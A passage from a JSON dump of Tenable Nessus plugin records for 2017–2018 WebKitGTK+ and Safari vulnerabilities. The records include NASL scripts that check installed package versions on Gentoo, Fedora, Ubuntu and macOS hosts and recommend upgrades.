"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201803-11.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108526);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4096\");\n script_xref(name:\"GLSA\", value:\"201803-11\");\n\n script_name(english:\"GLSA-201803-11 : WebKitGTK+: Multiple Vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201803-11\n(WebKitGTK+: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in WebKitGTK+. Please\n review the referenced CVE identifiers for details.\n \nImpact :\n\n An attacker could execute arbitrary commands via maliciously crafted web\n content.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201803-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All WebKitGTK+ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-libs/webkit-gtk-2.18.6'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:webkit-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-libs/webkit-gtk\", unaffected:make_list(\"ge 2.18.6\"), vulnerable:make_list(\"lt 2.18.6\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"WebKitGTK+\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:33:50", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4088), [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13885), [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7165), [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13884), [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7160), [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7153), [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7161), [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-02-05T00:00:00", "type": "nessus", "title": "Fedora 26 : webkitgtk4 (2018-43712163de)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-43712163DE.NASL", "href": "https://www.tenable.com/plugins/nessus/106594", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-43712163de.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106594);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4096\");\n script_xref(name:\"FEDORA\", value:\"2018-43712163de\");\n\n script_name(english:\"Fedora 26 : webkitgtk4 (2018-43712163de)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4088),\n [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13885),\n [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7165),\n [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13884),\n [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7160),\n [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7153),\n [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7161),\n [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-43712163de\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"webkitgtk4-2.18.6-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:33:44", "description": "Multiple security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the user interface, or execute arbitrary code. (CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160, CVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-31T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.10 : webkit2gtk vulnerabilities (USN-3551-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "UBUNTU_USN-3551-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106534", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3551-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106534);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/18 12:31:48\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4096\");\n script_xref(name:\"USN\", value:\"3551-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 : webkit2gtk vulnerabilities (USN-3551-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues were discovered in the WebKitGTK+ Web and\nJavaScript engines. If a user were tricked in to opening a specially\ncrafted website, an attacker could potentially exploit these to cause\na denial of service, spoof the user interface, or execute arbitrary\ncode. (CVE-2018-4088, CVE-2018-4096, CVE-2017-7153, CVE-2017-7160,\nCVE-2017-7161, CVE-2017-7165, CVE-2017-13884, CVE-2017-13885).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3551-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2019 Canonical, Inc. / NASL script (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.18.6-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.18.6-0ubuntu0.17.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:33:43", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4088), [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13885), [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7165), [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c gi?name=CVE-2017-13884), [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7160), [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7153), [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7161), [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-29T00:00:00", "type": "nessus", "title": "Fedora 27 : webkitgtk4 (2018-3199135a7e)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4096"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-3199135A7E.NASL", "href": "https://www.tenable.com/plugins/nessus/106418", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-3199135a7e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106418);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4096\");\n script_xref(name:\"FEDORA\", value:\"2018-3199135a7e\");\n\n script_name(english:\"Fedora 27 : webkitgtk4 (2018-3199135a7e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2018-4088](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4088),\n [CVE-2017-13885](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13885),\n [CVE-2017-7165](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7165),\n [CVE-2017-13884](https://cve.mitre.org/cgi-bin/cvename.c\n gi?name=CVE-2017-13884),\n [CVE-2017-7160](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7160),\n [CVE-2017-7153](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7153),\n [CVE-2017-7161](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7161),\n [CVE-2018-4096](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2018-4096)\n\nAdditional fixes :\n\n - Fix deadlock in GStreamer video sink during shutdown\n when accelerated compositing is disabled.\n\n - Several fixes and improvements in WebDriver.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-3199135a7e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"webkitgtk4-2.18.6-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:12", "description": "The version of Apple Safari installed on the remote host is prior to 11.0.3. It is, therefore, affected by multiple vulnerabilities as described in the HT208475 security advisory.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-08T00:00:00", "type": "nessus", "title": "Apple Safari < 11.0.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4089"], "modified": "2019-04-08T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700502.PRM", "href": "https://www.tenable.com/plugins/nnm/700502", "sourceData": "Binary data 700502.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-16T13:24:10", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.0.3. It is, therefore, affected by multiple vulnerabilities as described in the HT208475 security advisory.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-24T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 11.0.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI11_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/106305", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106305);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4096\");\n script_bugtraq_id(102775, 102778);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-01-23-5\");\n\n script_name(english:\"macOS : Apple Safari < 11.0.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 11.0.3. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208475 security advisory.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208475\");\n # https://lists.apple.com/archives/security-announce/2018/Jan/msg00004.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?20ca2ce2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 11.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n 